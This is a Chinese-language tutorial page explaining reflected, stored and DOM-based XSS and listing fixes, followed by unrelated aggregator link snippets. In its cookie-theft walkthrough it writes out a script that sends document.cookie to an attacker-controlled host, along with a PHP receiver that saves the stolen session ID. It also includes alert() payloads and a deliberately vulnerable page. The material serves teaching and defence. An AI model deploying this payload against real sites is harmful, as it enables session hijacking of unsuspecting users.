2. 程式人生 > >Xss和Csrf介紹

Xss和Csrf介紹

阿新 發佈:2018-02-11
常見 post 接收 一個 spa name down 技術 int

Xss和Csrf介紹

Xss

Xss(跨站腳本攻擊),全稱Cross Site Scripting,惡意攻擊者向web頁面中植入惡意js代碼,當用戶瀏覽到該頁時,植入的代碼被執行,達到惡意攻擊用戶的目的。

Xss攻擊的危害

  • 盜取各類用戶賬號
  • 竊取有商業價值的資料
  • 非法轉賬操作
  • 強制發送電子郵件
  • 控制受害者機器向其它網站發起攻擊
  • 等等...

原因分析

原因:沒有對客戶端提交的數據進行校驗分析,導致惡意代碼被植入。

根本解決:不要相信任何客戶端提交的任何數據!!!

Xss攻擊的分類

  • 反射型Xss攻擊
  • 存貯型Xss攻擊
  • DOMBasedXSS

反射型Xss攻擊

又稱為非持久性跨站點腳本攻擊

,它是最常見的類型的XSS。漏洞產生的原因是攻擊者註入的數據反映在響應中。

正常發送消息:

http://www.test.com/message.php?send=Hello,World!

接收者將會接收信息並顯示Hello,Word

非正常發送消息:

http://www.test.com/message.php?send=<script>alert("foolish!")</script>

接收者接收消息顯示的時候將會彈出警告窗口。

存貯型xss攻擊

又稱持久性Xss攻擊,存貯型Xss的攻擊代碼一般存儲在網站的數據庫中,每當用戶打開網站時被執行,因此危害更大。

舉個栗子:

一個簡單的留言板功能,表單提交域如下,

<input type="text" name="content" value="這裏是用戶填寫的數據">

攻擊者在value填寫

<script>alert('foolish!')</script>

【或者html其他標簽(破壞樣式。。。)、一段攻擊型代碼】,這些代碼便被提交到了數據庫中,其他用戶取出數據顯示的時候,將會執行這些攻擊性代碼。

DOMBasedXSS(基於Dom的跨站點腳本攻擊)

當用戶能夠通過交互修改瀏覽器頁面中的DOM(DocumentObjectModel)並顯示在瀏覽器上時,就有可能產生這種漏洞,從效果上來說它也是反射型XSS。

前提是易受攻擊的網站有一個HTML頁面采用不安全的方式從document.location或document.URL或document.referrer獲取數據(或者任何其他攻擊者可以修改的對象),所以應該避免直接從document.location或document.URL或document.referrer獲取數據。

舉個栗子:

<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system
…
</HTML>

非正常操作:

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

使用Xss攻擊來盜取cookie

1、網站所在域名為www.test88.com、攻擊者控制的主機www.linuxtest.com

2、test88.com中的表單,xss.html:

<!DOCTYPE html>
<html>
<head>
    <title>xss攻擊</title>
    <meta charset="utf-8">
</head>
<body>

<form action="./test99.php" method="post">
留言:<input type="text" name="content" value=""><br/>
<input type="submit" name="" value='提交'>
</form>
<br/>留言記錄:<br/>
</body>
</html>

3、惡意攻擊者提交表單時,插入相應代碼:

<script>
var Str=document.cookie;               //獲取cookie
var a =document.createElement('a');        //創建a標簽
a.href='http://www.linuxtest.com/test2.php?'+Str;   //攻擊者主機
a.innerHTML="<img src='./aa.jpg'>";        //掩護圖片
document.body.appendChild(a);              //將標簽添加到頁面中
</script>

4、數據(攻擊代碼)插入數據庫

5、攻擊者控制的主機中設置接收盜取的cookie:

<?php
header("content-type:text/html;charset=utf8");
echo "你的PHPSESSID被盜啦";
echo "<pre>";
print_r($_GET);
echo "</pre>";
$cookie=$_GET['PHPSESSID'];
file_put_contents('./xss.txt', $cookie);
?>

Xss漏洞的修復

  • HTML Encode
  • 將重要的cookie標記為http only, 這樣的話Javascript 中的document.cookie語句就不能獲取到cookie了
  • 規定表單數據值的類型,比如年齡int、姓名int+string
  • 過濾或移除特殊的Html標簽
  • 過濾JavaScript 事件的標簽

HTML Encode對應關系表:

技術分享圖片

Xss和Csrf介紹

相關推薦

XssCsrf介紹

常見 post 接收 一個 spa name down 技術 int Xss和Csrf介紹 Xss Xss(跨站腳本攻擊),全稱Cross Site Scripting,惡意攻擊者向web頁面中植入惡意js代碼,當用戶瀏覽到該頁時,植入的代碼被執行,達到惡意攻擊用戶的目的。

Django之XSSCSRF

alert .post import error onclick input 放置 edi 控制 一、XSS XSS:跨站腳本攻擊(也稱為XSS)指利用網站漏洞從用戶那裏惡意盜取信息。 1.工作流程圖 2.實例 1 pinglu = [] # 評論列表 2

XSS CSRF 攻擊

bbs 防止 最好的 防範 微軟 做的 不同 效果 授權 網站安全的基礎有三塊: (1) 防範中間人攻擊 (TLS mim, man in the middle) 當主機A、和機B通信時,都由主機C來為其“轉發”,而A、B之間並沒有真正意思上的直接通信,他們之間的信息傳遞同

XSSCSRF防範措施

(1)XSS:跨站指令碼攻擊 攻擊方式:在URL或者頁面輸入框中插入JavaScript程式碼。 防範: 設定httpOnly,禁止用document.cookie操作; 輸入檢查:在使用者輸入的時候進行格式檢查; 對輸出轉義。 (2)CSRF:跨站點偽造請求 攻擊方式:

XSS CSRF

感謝《碼農翻身》的文章讓我深刻記住這兩種攻擊方式。 2、 《黑客三兄弟》  下面是我的整理內容: 目錄 矛與盾教量: 矛:利用js獲取其他網站的cookie  盾:JS 同源策略 {protocol, host, por

XSSCSRF

XSS原理: 跨站指令碼攻擊XSS(Cross Site Scripting)攻擊是指攻擊者往Web頁面裡面插入惡意html標籤或者javascript程式碼。比如攻擊者在論壇中放一個看似安全的連結,騙取使用者點選後,竊取cookie中的使用者私密資訊;或者攻擊者在論壇中加

XSS CSRF簡述及預防措施

在 Web 安全領域中,XSS 和 CSRF 是最常見的攻擊方式。本文將會簡單介紹 XSS 和 CSRF 的攻防問題。 1. xss XSS,即 Cross Site Script,中譯是跨站指令碼攻擊;其原本縮寫是 CSS,但為了和層疊樣式表(Cascading S

常見網路安全問題及處理(xsscsrf

強調內容## 1、XSS(Cross Site Script) 把token儲存在cookie中,同時設定httpOnly。 2、CSRF(cross-site request forgery) 2.1、判斷reffer。系統改動最小,通過filt

XSSCSRF的原理及防禦

XSS是跨站指令碼攻擊,是一種常見的web應用程式中的電腦保安漏洞,xss通過使用者端注入惡意的可執行指令碼,若伺服器對使用者輸入不進行處理,直接將使用者的輸入輸出到瀏覽器,然後瀏覽器將會執行注入的指令碼;可以直接寫一個可執行指令碼,也可以直接寫html,在標籤裡面寫一個惡意

淺析XSSCSRF攻擊及防禦

定義 XSS(Cross Site Scripting跨站指令碼),為不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故將跨站指令碼攻擊縮寫為XSS。 CSRF(Cross-site request forg

XSSCSRF區別?

XSS原理: 根本我個人理解XSS又叫CSS(Cross-SiteScripting跨站指令碼攻擊)為了不和css層疊樣式表混淆,所以改成了XSS。XSS是將惡意的程式碼插入到html頁面中,當

web安全之XSSCSRF

分布 cookie 多個 token 成本高 手機 短信 網絡 白名單 WEB安全方向 瀏覽器沙箱機制xss反射型,存儲型,這個更多是後端xss DOM Based,前端處理,decodeURIComponent賦值給InnerHTML xss防禦:認證cookie,設

瀏覽器常見攻擊方式(XSSCSRF

常見的瀏覽器攻擊分為兩種,一種為XSS(跨站指令碼攻擊),另一種則為CSRF(跨站請求偽造)。 XSS(跨站指令碼攻擊) 定義 XSS 全稱是 Cross Site Scripting,為了與“CSS”區分開來,故簡稱 XSS,翻譯過來就是“跨站指令碼”。X

Spring 防禦CSRFXSSSQL注入攻擊

對每個post請求的引數過濾一些關鍵字,替換成安全的,例如:< > ' " \ /  # & 方法是實現一個自定義的HttpServletRequestWrapper,然後在Filter裡面呼叫它,替換掉getParameter函式即可。 首先新增一個X

Spring MVC防禦CSRFXSSSQL注入攻擊

說說CSRF 對CSRF來說,其實Spring3.1、ASP.NET MVC3、Rails、Django等都已經支援自動在涉及POST的地方新增Token(包括FORM表單和AJAX POST等),似乎是一個tag的事情,但如果瞭解一些實現原理,手工來處理,也是有好處的。因為其實很多人做web開

jQuery選擇器引擎Sizzle介紹

document 遞歸 展示 學院 extra 上下文 和源 err sizzle p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 14.0px Arial; color: #323333 } p.p2 { margin: 0.0

軟中斷tasklet介紹

表示 種類 blog 連接 關系 定義 深入 tor 好的 今天看了下tasklet,重點分析了其和軟中斷的關系,特此記錄 關於軟中斷,在之前的中斷文章中已經有所介紹,這裏就不多說了,只是說明下,系統中默認支持32種軟中斷,而實際上系統定義的軟中斷僅有以下幾種。 e

架構師之路--搜索業務技術介紹及容錯機制

朋友 單節點 adb 一致性 公司 一個 memcache 消息通知 包括  今天和搜索部門一起做了一下MQ的遷移,順便交流一下業務和技術。發現現在90後小夥都挺不錯。我是指能力和探究心。我家男孩,不招女婿。   在前面的文章中也提到,我們有媒資庫(樂視視頻音頻本身內容)

Linux 查看磁盤分區、文件系統、磁盤的使用情況相關的命令工具介紹

rfs partition pan 包含 logical cor name blocks 為什麽 Linux 磁盤分區表、文件系統的查看、統計的工具很多,有些工具是多功能的,不僅僅是查看磁盤的分區表,而且也能進行磁盤分區的操作;但在本文,我們只講磁盤分區的查看,以及分區的

Scanner的概述方法介紹

數據 tint sys 標記 strong new can 取字符 col Scanner的概述和方法介紹 一:Scanner的構造方法原理    1.Scanner(InputStream source)         構造一個新的 Scanner,它